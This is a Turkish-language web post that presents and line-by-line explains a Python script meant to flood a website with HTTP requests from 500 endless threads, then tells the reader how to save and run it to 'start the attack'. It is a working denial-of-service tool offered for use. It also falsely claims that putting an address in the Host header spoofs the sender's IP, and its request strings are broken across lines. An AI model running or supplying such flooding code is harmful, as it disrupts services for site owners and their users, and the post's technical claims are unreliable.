- 347 Okunma
- 0 Yorum
- 0 Beğeni
PYTHONLA DDOS SALDIRISI YAPMAK
Bu, yazmış olduğum kod Python dilinde yazılmış bir kod parçasıdır. Bu kod, bir web sitesine sahte IP adresi kullanarak çok sayıda HTTP isteği göndererek bir DDoS (Dağıtık Hizmet Engelleme) saldırısı gerçekleştirmeye çalışır. Bu tür saldırılar, web sitesinin sunucularını aşırı yükleyerek hizmet vermelerini engellemeyi amaçlar. Linkini yazmış olduğum siteyse sadece bir örnek olup bu link makalelerde kullanılmak için yazılmış ve kullanılmasına müsaade edilmiş bir linktir.
import socket
import threading
target = ’www.example.com’ # saldırı yapılacak web sitesi
port = 80 # web sitesinin port numarası
fake_ip = ’182.21.20.32’ # sahte IP adresi
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1
").encode(’ascii’), (target, port))
s.sendto(("Host: " + fake_ip + "
").encode(’ascii’), (target, port))
s.close()
for i in range(500): # 500 adet paralel bağlantı oluştur
thread = threading.Thread(target=attack)
thread.start()
Bu kodu açıklamak için, önce her satırın ne yaptığını anlatayım:
- `import socket` : Bu satır, Python programının ağ bağlantısı kurabilmesi için `socket` adlı bir modülü içe aktarır.
- `import threading` : Bu satır, Python programının birden fazla iş parçacığı (thread) oluşturabilmesi için `threading` adlı bir modülü içe aktarır.
- `target = ’www.example.com’` : Bu satır, saldırı yapılacak web sitesinin adını `target` adlı bir değişkene atar.
- `port = 80` : Bu satır, web sitesinin port numarasını `port` adlı bir değişkene atar. Genellikle web siteleri 80 numaralı portu kullanır.
- `fake_ip = ’182.21.20.32’` : Bu satır, sahte bir IP adresini `fake_ip` adlı bir değişkene atar. Bu IP adresi, saldırıyı gerçekleştirenin kimliğini gizlemek için kullanılır.
- `def attack():` : Bu satır, saldırı işlemini gerçekleştiren bir fonksiyon tanımlar. Fonksiyonun adı `attack` olarak belirlenir.
- `while True:` : Bu satır, fonksiyonun içindeki kodun sürekli olarak tekrarlanmasını sağlar. Bu, web sitesine sürekli olarak istek göndermek için yapılır.
- `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)` : Bu satır, bir ağ bağlantısı oluşturmak için bir `socket` nesnesi oluşturur. `socket.AF_INET` parametresi, IPv4 protokolünü kullanacağını belirtir. `socket.SOCK_STREAM` parametresi, TCP protokolünü kullanacağını belirtir.
- `s.connect((target, port))` : Bu satır, oluşturulan `socket` nesnesini, hedef web sitesinin adresi ve port numarası ile bağlar.
- `s.sendto(("GET /" + target + " HTTP/1.1
").encode(’ascii’), (target, port))` : Bu satır, bağlanılan web sitesine bir HTTP isteği gönderir. Bu istek, web sitesinin ana sayfasını (`/`) getirmesini ister. `GET /` kısmı, isteğin türünü ve istenen kaynağı belirtir. `target` kısmı, web sitesinin adını ekler. `HTTP/1.1
` kısmı, isteğin protokolünü ve bir satır sonu karakteri belirtir. `.encode(’ascii’)` kısmı, isteği ASCII formatına dönüştürür. `(target, port)` kısmı, isteğin gönderileceği adresi ve port numarasını belirtir.
- `s.sendto(("Host: " + fake_ip + "
").encode(’ascii’), (target, port))` : Bu satır, bağlanılan web sitesine bir HTTP başlığı gönderir. Bu başlık, isteği gönderenin IP adresini (`Host`) belirtir. Bu IP adresi, sahte bir IP adresi olarak belirlenmiştir. `
` kısmı, başlığın sonunu ve boş bir satırı belirtir. Diğer kısımlar, önceki satırla aynı işlevi görür.
- `s.close()` : Bu satır, bağlantıyı kapatır.
- `for i in range(500):` : Bu satır, 500 kez tekrarlanacak bir döngü başlatır. Bu, 500 adet paralel bağlantı oluşturmak için yapılır.
- `thread = threading.Thread(target=attack)` : Bu satır, her bir bağlantı için bir iş parçacığı oluşturur. Oluşturulan iş parçacığı, `attack` fonksiyonunu çalıştıracaktır.
- `thread.start()` : Bu satır, oluşturulan iş parçacığını başlatır.
Bu kodun amacı, web sitesine sahte IP adresi kullanarak çok sayıda HTTP isteği göndererek bir DDoS saldırısı gerçekleştirmektir. Bu tür saldırılar, web sitesinin sunucularını aşırı yükleyerek hizmet vermelerini engellemeyi amaçlar.
Bu kodu çalıştırmak için, Python yüklü bir bilgisayara ihtiyacınız var. Python, bir programlama dili ve bir yazılım platformudur. Python’i indirip kurun. Python kurduktan sonra, bu kodu bir metin editörü ile açabilir ve kaydedebilirsiniz. Örneğin, `saldiri.py` adında bir dosya oluşturabilirsiniz. Daha sonra, bir komut satırı veya terminal penceresi açarak, bu dosyayı çalıştırabilirsiniz. Örneğin, Windows’ta `python saldiri.py` komutunu yazabilirsiniz. Bu komut, kodu çalıştıracak ve web sitesine saldırı başlatacaktır.
YORUMLAR
Henüz yorum yapılmamış.